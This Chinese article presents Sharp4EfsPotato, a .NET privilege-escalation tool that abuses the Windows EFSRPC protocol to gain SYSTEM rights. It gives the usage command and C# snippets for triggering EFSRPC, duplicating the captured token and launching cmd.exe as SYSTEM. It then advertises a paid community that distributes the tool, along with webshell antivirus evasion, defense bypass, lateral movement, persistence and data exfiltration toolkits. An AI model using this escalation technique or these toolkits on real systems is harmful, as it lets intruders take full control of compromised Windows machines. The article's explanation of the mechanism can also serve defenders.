.NET 内网提权工具：Sharp4EfsPotato

Sharp4EfsPotato 是一款专门设计的工具，用于利用微软加密文件系统远程协议（EFSRPC）中的漏洞进行权限提升。该漏洞允许攻击者在已被入侵的Windows系统上获取SYSTEM级别的权限。该工具利用了EFSRPC协议中的漏洞，可以将普通用户权限提升到SYSTEM权限。

当运行该工具时，它会与EFSRPC协议交互，从而提升权限，最终生成一个具有SYSTEM级权限的命令行窗口（cmd.exe）。

该工具也可以通过-p参数，指定运行的程序，具体如下所示。

Sharp4EfsPotato.exe -p winver.exe

EFSRPC（Encrypting File System Remote Protocol，加密文件系统远程协议） 是Windows系统中用于在网络上执行与加密文件系统（EFS）相关操作的协议。它允许客户端请求在远程服务器上执行加密或解密文件的操作。EFSRPC协议是Windows远程过程调用（RPC）机制的一部分，是远程文件加密管理的重要组成部分。

然而，EFSRPC协议中存在的漏洞使得未经授权的攻击者可以利用该协议执行通常需要更高权限的操作，例如获得SYSTEM权限。攻击通常涉及欺骗系统代表低权限用户执行操作，从而实现权限提升。工具通过创建EfsRpc类的实例来初始化EFSRPC协议。然后调用TriggerEfsRpc()方法，向目标机器上的易受攻击的EFSRPC端点发送请求，实现的代码如下所示。

EfsRpc efsRpc = new EfsRpc();
Thread.Sleep(1000);
efsRpc.TriggerEfsRpc();

在成功与EFSRPC交互后，该工具尝试复制作为RPC交互一部分获得的令牌，使用DuplicateTokenEx函数创建一个主令牌，用于以SYSTEM帐户创建新进程，具体代码如下所示。

IntPtr impersonatedPrimary;
bool flag3 = !ImpersonationToken.DuplicateTokenEx(efsRpc.Token, ImpersonationToken.TOKEN_ALL_ACCESS, IntPtr.Zero, ImpersonationToken.SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, ImpersonationToken.TOKEN_TYPE.TokenPrimary, out impersonatedPrimary);

令牌成功复制后，该工具会创建一个新线程，将线程令牌设置为模拟的SYSTEM令牌，然后初始化启动新进程所需的结构，并调用CreateProcessWithTokenW以SYSTEM权限启动cmd.exe或其他指定程序。

Thread systemThread = new Thread(delegate()
{
    ImpersonationToken.SetThreadToken(IntPtr.Zero, efsRpc.Token);
    ImpersonationToken.STARTUPINFO si = default(ImpersonationToken.STARTUPINFO);
    ImpersonationToken.PROCESS_INFORMATION pi = default(ImpersonationToken.PROCESS_INFORMATION);
    si.cb = Marshal.SizeOf<ImpersonationToken.STARTUPINFO>(si);
    si.lpDesktop = "WinSta0\Default";
    string finalArgs = null;
    bool flag4 = programArgs != null;
    if (flag4)
    {
        finalArgs = string.Format(""{0}" {1}", program, programArgs);
    }
    bool flag5 = !ImpersonationToken.CreateProcessWithTokenW(efsRpc.Token, (ImpersonationToken.LogonFlags)0, program, finalArgs, ImpersonationToken.CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi);
});

综上，当不带参数运行Sharp4EfsPotato时，它会默认启动一个具有SYSTEM权限的cmd.exe实例。这样，攻击者可以以最高权限用户的身份与系统交互，绕过正常的安全限制。工具已经打包在星球，感兴趣的朋友可以加入自取。

从漏洞分析到安全攻防，我们涵盖了.NET安全各个关键方面，为您呈现最新、最全面的.NET安全知识，下面是公众号发布的精华文章集合，推荐大家阅读！

目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一，从.NET Framework到.NET Core，从Web应用到PC端软件应用，无论您是初学者还是经验丰富的开发人员，都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖，并且每日分享.NET安全技术干货以及交流解答各类技术等问题，社区中发布很多高质量的.NET安全资源，可以说市面上很少见，都是干货。

星球文化始终认为授人以鱼不如授人以渔！加入星球后可以跟星主和嘉宾们一对一提问交流，20+个专题栏目涵盖了点、线、面、体等知识面，助力师傅们快速成长！其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    我们倾力打造专刊、视频等配套学习资源，循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

我们还有一个会员专属的内部星球陪伴群，加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问，以获取帮助迅速解决问题。

为了助力大家在2024国家级hvv演练中脱颖而出，我们特别整理出了一套涵盖dotNet安全矩阵星球的八大.NET相关方向工具集。

.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输

这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术，更是每一位网络安全爱好者不可或缺的实战利器。